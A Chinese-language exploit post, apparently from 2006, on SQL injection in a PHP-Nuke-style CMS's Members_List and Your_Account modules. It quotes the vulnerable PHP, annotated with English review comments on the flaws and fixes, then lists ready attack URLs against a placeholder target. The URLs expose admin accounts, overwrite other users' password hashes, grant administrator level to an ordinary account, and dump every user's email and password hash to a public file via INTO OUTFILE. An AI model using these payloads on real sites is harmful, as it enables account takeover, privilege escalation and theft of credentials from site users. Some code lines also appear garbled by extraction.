利用SQL注入缺陷进行攻击的方法及代码

王朝mssql·作者佚名  2006-11-24

Members_List、Your_Account模块中存在SQL注入缺陷。如果magic_quotes_gpc选项为“OFF”,攻击者可以使用下列攻击方法及代码利用该缺陷:

PHP代码/位置:

/modules/Members_List/index.php :

------------------------------------------------------------------------

[...]

$count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";

$select = "select uid, name, uname, femail, url from

".$user_prefix."_users ";

$where = "where uname != Anonymous ";

if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {

$where .= "AND uname like ".$letter."% ";

} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {

$where .= "AND uname REGEXP \"^\[1-9]\" ";

} else {

$where .= "";

}

$sort = "order by $sortby";

$limit = " ASC LIMIT ".$min.", ".$max;

$count_result = sql_query($count.$where, $dbi);

$num_rows_per_order = mysql_result($count_result,0,0);

$result = sql_query($select.$where.$sort.$limit, $dbi) or die();

echo "<br>";

if ( $letter != "front" ) {

echo "<table width=\"100%\" border=\"0\"

cellspacing=\"1\"><tr>\n";

echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font

color=\"$textcolor2\"><b>"._NICKNAME."</b></font></td>\n";

echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font

color=\"$textcolor2\"><b>"._REALNAME."</b></font></td>\n";

echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font

color=\"$textcolor2\"><b>"._EMAIL."</b></font></td>\n";

echo "<td BGCOLOR=\"$bgcolor4\" align=\"center\"><font

color=\"$textcolor2\"><b>"._URL."</b></font></td>\n";

$cols = 4;

[...]

------------------------------------------------------------------------

/modules/Your_Account/index.php :

switch($op) {

[...]

case "mailpasswd":

mail_password($uname, $code);

break;

case "userinfo":

userinfo($uname, $bypass, $hid, $url);

break;

case "login":

login($uname, $pass);

break;

[...]

case "saveuser":

saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass,

$bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,

$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);

break;

[...]

case "savehome":

savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,

$popmeson);

break;

case "savetheme":

savetheme($uid, $theme);

break;

[...]

case "savecomm":

savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);

break;

[...]

}

------------------------------------------------------------------------

/modules/Your_Account/index.php :

[...]

// Saves the profile fields submitted from the "edit your info" form for the
// currently logged-in user, optionally sets a new password, re-issues the
// login cookie and redirects back to the module.
//
// The parameters are raw request fields handed over by the switch($op)
// dispatcher. Each of them, and the cookie-derived username, is pasted into
// SQL by string interpolation with no quoting, escaping or type check, so the
// SELECT/UPDATE statements below are SQL-injectable. magic_quotes_gpc and
// addslashes() only protect values that sit inside SQL quotes; these values
// are not quoted at all, so the fix is parameterised queries (or at minimum
// (int) casts for numeric columns and quote+escape for string columns).
// If the cookie/uid ownership check fails the function silently does nothing.
function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass,

$vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,

$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {

// NOTE(review): $minpass is read below but is not declared here; presumably a
// site-wide config global (register_globals era) — confirm.
global $user, $Cookie, $userinfo, $EditedMessage, $user_prefix, $dbi,

$module_name;

// Decode the login cookie into $Cookie; element 1 is the username and
// element 2 the stored password value, as the comparison below shows.
Cookiedecode($user);

$check = $Cookie[1];

$check2 = $Cookie[2];

// Ownership lookup. $check comes straight from the client's cookie and is
// interpolated unquoted into the WHERE clause.
$result = sql_query("select uid, pass from ".$user_prefix."_users where

uname=$check", $dbi);

list($vuid, $ccpass) = sql_fetch_row($result, $dbi);

// The submitted $uid must match the row found via the cookie username, and
// the cookie's pass value must equal the stored one. $uid is only compared
// with == and is never validated as an integer before being reused in SQL.
if (($uid == $vuid) AND ($check2 == $ccpass)) {

// Prefix a scheme when the URL lacks one. The stray ";" before the comma
// looks like an extraction artifact (presumably eregi("http://", $url));
// eregi is the case-insensitive POSIX regex function, removed in PHP 7.
if (!eregi("http://";, $url)) {

$url = "http://$url";

}

// Password-change validation: the confirmation must match and the length
// must be at least $minpass. Both failures only print a message.
if ((isset($pass)) && ("$pass" != "$vpass")) {

echo "<center>"._PASSDIFFERENT."</center>";

} elseif (($pass != "") && (strlen($pass) < $minpass)) {

echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b>

"._CHARLONG."</center>";

} else {

// filter_text() and FixQuotes() are project helpers not shown in this
// excerpt; filter_text() returns its result via the global $EditedMessage.
// Whatever they do, $bio is still interpolated unquoted into SQL below.
if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio =

FixQuotes($bio); }

// Branch 1: a new password was supplied.
if ($pass != "") {

// Redundant: $user was already decoded at the top of this function.
Cookiedecode($user);

// Lock the table so the UPDATE and the re-login SELECT below see one
// consistent row; released by UNLOCK TABLES after the cookie is re-issued.
sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);

// Unsalted MD5 is not an acceptable password hash; use password_hash().
$pass = md5($pass);

// INJECTION POINT: every SET value and the WHERE value are request-supplied
// and interpolated without quoting, escaping or type checks, so they can
// alter the statement beyond the intended column. Bind them as parameters.
sql_query("update ".$user_prefix."_users set name=$realname,

email=$email, femail=$femail, url=$url, pass=$pass, bio=$bio ,

user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ,

user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig,

user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm,

newsletter=$newsletter where uid=$uid", $dbi);

// Re-select by username and new hash so the fresh login cookie carries the
// updated values; $uname and $pass are again interpolated unquoted.
$result = sql_query("select uid, uname, pass, storynum, umode, uorder,

thold, noscore, ublockon, theme from ".$user_prefix."_users where

uname=$uname and pass=$pass", $dbi);

if(sql_num_rows($result, $dbi)==1) {

$userinfo = sql_fetch_array($result, $dbi);

// Re-issue the login cookie. The bareword array keys (uid, uname, ...)
// rely on PHP treating undefined constants as strings — an Error in PHP 8.
doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],

$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],

$userinfo[theme],$userinfo[commentmax]);

} else {

echo "<center>"._SOMETHINGWRONG."</center><br>";

}

sql_query("UNLOCK TABLES", $dbi);

// Branch 2: no password change. Same unquoted interpolation as above, minus
// the pass column, and without the table lock.
} else {

sql_query("update ".$user_prefix."_users set name=$realname,

email=$email, femail=$femail, url=$url, bio=$bio,

user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ,

user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig,

user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm,

newsletter=$newsletter where uid=$uid", $dbi);

// Dead code: $a is derived from $attach but never read again in this function.
if ($attach) {

$a = 1;

} else {

$a = 0;

}

}

// Redirect back to the module once the profile has been written.
Header("Location: modules.php?name=$module_name");

}

}

}

[...]

// Saves the "home" preferences (story count, custom block, broadcast and
// private-message flags) for the logged-in user, refreshes the login cookie
// and redirects back to the module.
//
// $storynum, $broadcast, $popmeson and $uid are request values interpolated
// into the UPDATE with no quoting, escaping or type check, so the statement is
// SQL-injectable; only $ublockon is normalised to 0/1. magic_quotes_gpc does
// not protect unquoted values — use parameterised queries or (int) casts.
// $uname is accepted but never used. If the cookie/uid ownership check fails
// the function silently does nothing.
function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,

$popmeson) {

global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;

// Decode the login cookie: element 1 is the username, element 2 the stored
// password value (see the comparison below).
Cookiedecode($user);

$check = $Cookie[1];

$check2 = $Cookie[2];

// Ownership lookup; the cookie-derived $check is interpolated unquoted.
$result = sql_query("select uid, pass from ".$user_prefix."_users where

uname=$check", $dbi);

list($vuid, $ccpass) = sql_fetch_row($result, $dbi);

// The submitted $uid must match the cookie user's row and the cookie pass
// value must equal the stored one; $uid is never validated as an integer.
if (($uid == $vuid) AND ($check2 == $ccpass)) {

// Checkbox semantics: non-null -> 1, otherwise 0. This is the only field in
// this function that cannot carry arbitrary text into the query.
if(isset($ublockon)) $ublockon=1; else $ublockon=0;

// FixQuotes() is a project helper not shown in this excerpt; whether it
// quotes/escapes enough for the unquoted "ublock=$ublock" below cannot be
// verified from here.
$ublock = FixQuotes($ublock);

// INJECTION POINT: storynum, broadcast, popmeson and uid are raw request
// values pasted into SQL without quoting, escaping or type checks.
sql_query("update ".$user_prefix."_users set storynum=$storynum,

ublockon=$ublockon, ublock=$ublock, broadcast=$broadcast,

popmeson=$popmeson where uid=$uid", $dbi);

// Presumably repopulates the global $userinfo from the database so the new
// cookie reflects the saved values — confirm against getusrinfo().
getusrinfo($user);

// Re-issue the login cookie. The bareword array keys (uid, uname, ...) rely
// on PHP treating undefined constants as strings — an Error in PHP 8.
doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],

$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],

$userinfo[theme],$userinfo[commentmax]);

Header("Location: modules.php?name=$module_name");

}

}

// Stores the theme chosen by the logged-in user, refreshes the login cookie
// and redirects back to the module with the theme in the query string.
//
// $theme and $uid are request values interpolated into the UPDATE with no
// quoting, escaping or type check, so the statement is SQL-injectable; because
// the values are not quoted, magic_quotes_gpc is no mitigation. $theme should
// be validated against the set of installed themes and $uid cast to int (or
// both bound as parameters). If the cookie/uid ownership check fails the
// function silently does nothing.
function savetheme($uid, $theme) {

global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;

// Decode the login cookie: element 1 is the username, element 2 the stored
// password value (see the comparison below).
Cookiedecode($user);

$check = $Cookie[1];

$check2 = $Cookie[2];

// Ownership lookup; the cookie-derived $check is interpolated unquoted.
$result = sql_query("select uid, pass from ".$user_prefix."_users where

uname=$check", $dbi);

list($vuid, $ccpass) = sql_fetch_row($result, $dbi);

// The submitted $uid must match the cookie user's row and the cookie pass
// value must equal the stored one; $uid is never validated as an integer.
if (($uid == $vuid) AND ($check2 == $ccpass)) {

// INJECTION POINT: theme and uid are raw request values pasted into the SET
// and WHERE clauses without quoting, escaping or type checks.
sql_query("update ".$user_prefix."_users set theme=$theme where

uid=$uid", $dbi);

// Presumably repopulates the global $userinfo from the database so the new
// cookie reflects the saved values — confirm against getusrinfo().
getusrinfo($user);

// Re-issue the login cookie. The bareword array keys (uid, uname, ...) rely
// on PHP treating undefined constants as strings — an Error in PHP 8.
doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],

$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],

$userinfo[theme],$userinfo[commentmax]);

// The raw $theme is also reflected, unencoded, into a response header; it
// should be URL-encoded (and validated) before being placed here.
Header("Location: modules.php?name=$module_name&theme=$theme");

}

}

[...]

// Saves the comment-display preferences (mode, order, threshold, score flag,
// max comments) for the logged-in user, refreshes the login cookie and
// redirects back to the module.
//
// $umode, $uorder, $thold, $commentmax and $uid are request values
// interpolated into the UPDATE with no quoting, escaping or type check, so the
// statement is SQL-injectable; only $noscore is normalised to 0/1.
// magic_quotes_gpc does not protect unquoted values — use parameterised
// queries or (int) casts. $uname is accepted but never used. If the
// cookie/uid ownership check fails the function silently does nothing.
function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore,

$commentmax) {

global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;

// Decode the login cookie: element 1 is the username, element 2 the stored
// password value (see the comparison below).
Cookiedecode($user);

$check = $Cookie[1];

$check2 = $Cookie[2];

// Ownership lookup; the cookie-derived $check is interpolated unquoted.
$result = sql_query("select uid, pass from ".$user_prefix."_users where

uname=$check", $dbi);

list($vuid, $ccpass) = sql_fetch_row($result, $dbi);

// The submitted $uid must match the cookie user's row and the cookie pass
// value must equal the stored one; $uid is never validated as an integer.
if (($uid == $vuid) AND ($check2 == $ccpass)) {

// Checkbox semantics: non-null -> 1, otherwise 0. This is the only field in
// this function that cannot carry arbitrary text into the query.
if(isset($noscore)) $noscore=1; else $noscore=0;

// INJECTION POINT: umode, uorder, thold, commentmax and uid are raw request
// values pasted into SQL without quoting, escaping or type checks.
sql_query("update ".$user_prefix."_users set umode=$umode,

uorder=$uorder, thold=$thold, noscore=$noscore,

commentmax=$commentmax where uid=$uid", $dbi);

// Presumably repopulates the global $userinfo from the database so the new
// cookie reflects the saved values — confirm against getusrinfo().
getusrinfo($user);

// Re-issue the login cookie. The bareword array keys (uid, uname, ...) rely
// on PHP treating undefined constants as strings — an Error in PHP 8.
doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],

$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],

$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);

Header("Location: modules.php?name=$module_name");

}

}

[...]

------------------------------------------------------------------------

/modules/Your_Account/index.php :

[...]

function mail_password($uname, $code) {

global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi,

$module_name;

$result = sql_query("select email, pass from ".$user_prefix."_users

where (uname=$uname)", $dbi);

if(!$result) {

include("header.php");

OpenTable();

echo "<center>"._SORRYNOUSERINFO."</center>";

CloseTable();

include("footer.php");

[...]

------------------------------------------------------------------------

------------------------------------------------------------------------

[...]

function userinfo($uname, $bypass=0, $hid=0, $url=0) {

global $user, $Cookie, $sitename, $prefix, $user_prefix, $dbi, $admin,

$broadcast_msg, $my_headlines, $module_name;

$result = sql_query("select uid, femail, url, bio, user_avatar,

user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest,

user_sig, pass, newsletter from ".$user_prefix."_users where

uname=$uname", $dbi);

$userinfo = sql_fetch_array($result, $dbi);

[...]

------------------------------------------------------------------------

------------------------------------------------------------------------

[...]

function login($uname, $pass) {

global $setinfo, $user_prefix, $dbi, $module_name;

$result = sql_query("select pass, uid, storynum, umode, uorder, thold,

noscore, ublockon, theme, commentmax from ".$user_prefix."_users where

uname=$uname", $dbi);

$setinfo = sql_fetch_array($result, $dbi);

[...]

}

[...]

------------------------------------------------------------------------

Members_List模块:

- 显示用户:

http://[target]/modules.php?name=Members_List&letter=All&sortby=pass

- 显示用户:

http://[target]/modules.php?name=Members_List&letter=All&sortby=uid

- 显示moderators :

http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=2/*

- 显示管理员:

http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=4/*

- 显示所有以“abc”开头的用户 :

http://[target]/modules.php?name=Members_List&letter=%20OR%20pass%20LIKE%20abc%25/*

Your_Account模块 :

- 将“Admind”用户更名为“Hophophop” :

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,name=Hophophop%20where%20uname=Admin/*&uid=[OUR_UID]

- 在md5_decrypted中将“Bob”的密码改为“d41d8cd98f00b204e9800998ecf8427e”:

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,

pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=saveuser&realname=,

pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=saveuser&email=,

pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=savehome&storynum=,

pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=savehome&ublockon=,

pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=savecomm&umode=,

pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=savecomm&thold=,

pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]

- 将普通用户提升至管理员权限:

http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,user_level=4&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=saveuser&femail=,user_level=4&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=saveuser&url=http://,user_level=4&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=savehome&broadcast=,user_level=4&uid=[OUR_UID]

或:

http://[target]/modules.php?name=Your_Account&op=savecomm&uorder=,user_level=4&uid=[OUR_UID]

- 将所有用户的电子邮件和crypted密码保存在http://[target]/AllMailPass.txt中 :

http://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=)

%20OR%201=1%20INTO%20OUTFILE%20/[path/to/site]/AllMailPass.txt/*

利用Cookie发送crypted密码能访问用户帐户。

- 将用户的所有信息保存在http://[target]/admintxt中:

http://[target]/modules.php?name=Your_Account&op=login&uname=%20OR%user_level>

1%20INTO%20OUTFILE%20/[path/to/site]/admin.txt

[path/to/site]能在http://[target]/modules/Forums/bb_smilies.php中查询到。
